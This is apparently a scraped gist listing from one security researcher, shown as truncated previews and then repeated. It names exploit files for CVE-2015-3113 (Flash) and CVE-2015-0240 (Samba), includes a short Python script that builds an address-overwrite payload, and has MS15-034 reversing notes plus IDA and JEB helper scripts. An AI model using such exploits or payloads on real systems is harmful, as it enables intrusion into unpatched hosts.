huyna

## cve2015_3113.as
package
{
   import flash.display.MovieClip;
   import flash.utils.ByteArray;
   import flash.net.URLLoader;
   import flash.utils.Timer;
   import flash.media.Video;
   import flash.display.Loader;
   import flash.net.URLRequest;
   import flash.events.Event;

## strace-static.diff
# dev:~/android/source/external/strace$ git diff
#
# to apply & build:
#
# dev:~/android/source/external/strace$ patch -p1 < strace-static.diff
# dev:~/android/source/external/strace$ cd ../..
# dev:~/android/source$ mmm external/strace
#
diff --git a/Android.mk b/Android.mk
index 5274280..4f1707e 100644

## 11111
import struct

data1 = struct.pack('<i',0x08048883)+'\x00'
data1 = data1+'b'*(38-len(data1))+ '\x18\xa0'

data2 = struct.pack('<i',0x08048610)+'\x00'
data2 = data2+'c'*(38-len(data2))+ '\x24\xa0'

print data1+data2

## hash
3B9DCDD69AC7615CD0E2941DC8E23DDF


5730866B34EF589BD398C9A9B6D7E307

7D71593A7D159C754055E16C26B844112E7B4132

## http_sys_pseudo.c
/*
Pseudo code in HTTP.sys to understand flow related to MS15-034

All pseudo code are reversed from vulnerable HTTP.sys on Windows 7 SP1 x86

For anyone want to know what function are patched.
Just open patched version and find all functions reference to RtlULongLongAdd().
*/


## cve-2015-0240_samba_exploit.py
#!/usr/bin/python
"""
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya

The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value on 'creds' address.

Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/

## 122313
1449130208829

## 123414
https://drive.google.com/file/d/0B9Cw8k5__G16c05aeG81QjVRRlk/view?pref=2&pli=1

## gist:41a8579ed9d86cf770f3
# hotkey_utils.py - bNull
#
# Some useful shortcuts for binding to hotkeys. Current output/hotkeys:
#
# [+] Bound make_dwords to Ctrl-Alt-D
# [+] Bound make_cstrings to Ctrl-Alt-A
# [+] Bound make_offset to Ctrl-Alt-O

import idaapi
import idc

## DexGuardDecoder.java
import jeb.api.IScript;
import jeb.api.JebInstance;
import jeb.api.ast.*;
import jeb.api.ast.Class;
import jeb.api.dex.*;
import jeb.api.ui.JavaView;
import jeb.api.ui.View;

import java.util.Arrays;
import java.util.HashMap;
	package
	{
	import flash.display.MovieClip;
	import flash.utils.ByteArray;
	import flash.net.URLLoader;
	import flash.utils.Timer;
	import flash.media.Video;
	import flash.display.Loader;
	import flash.net.URLRequest;
	import flash.events.Event;
	# dev:~/android/source/external/strace$ git diff
	#
	# to apply & build:
	#
	# dev:~/android/source/external/strace$ patch -p1 < strace-static.diff
	# dev:~/android/source/external/strace$ cd ../..
	# dev:~/android/source$ mmm external/strace
	#
	diff --git a/Android.mk b/Android.mk
	index 5274280..4f1707e 100644
	import struct

	data1 = struct.pack('<i',0x08048883)+'\x00'
	data1 = data1+'b'*(38-len(data1))+ '\x18\xa0'

	data2 = struct.pack('<i',0x08048610)+'\x00'
	data2 = data2+'c'*(38-len(data2))+ '\x24\xa0'

	print data1+data2
	3B9DCDD69AC7615CD0E2941DC8E23DDF


	5730866B34EF589BD398C9A9B6D7E307

	7D71593A7D159C754055E16C26B844112E7B4132
	/*
	Pseudo code in HTTP.sys to understand flow related to MS15-034

	All pseudo code are reversed from vulnerable HTTP.sys on Windows 7 SP1 x86

	For anyone want to know what function are patched.
	Just open patched version and find all functions reference to RtlULongLongAdd().
	*/
	#!/usr/bin/python
	"""
	Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya

	The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by
	ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
	in libtalloc does not write a value on 'creds' address.

	Reference:
	- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
	# hotkey_utils.py - bNull
	#
	# Some useful shortcuts for binding to hotkeys. Current output/hotkeys:
	#
	# [+] Bound make_dwords to Ctrl-Alt-D
	# [+] Bound make_cstrings to Ctrl-Alt-A
	# [+] Bound make_offset to Ctrl-Alt-O

	import idaapi
	import idc
	import jeb.api.IScript;
	import jeb.api.JebInstance;
	import jeb.api.ast.*;
	import jeb.api.ast.Class;
	import jeb.api.dex.*;
	import jeb.api.ui.JavaView;
	import jeb.api.ui.View;

	import java.util.Arrays;
	import java.util.HashMap;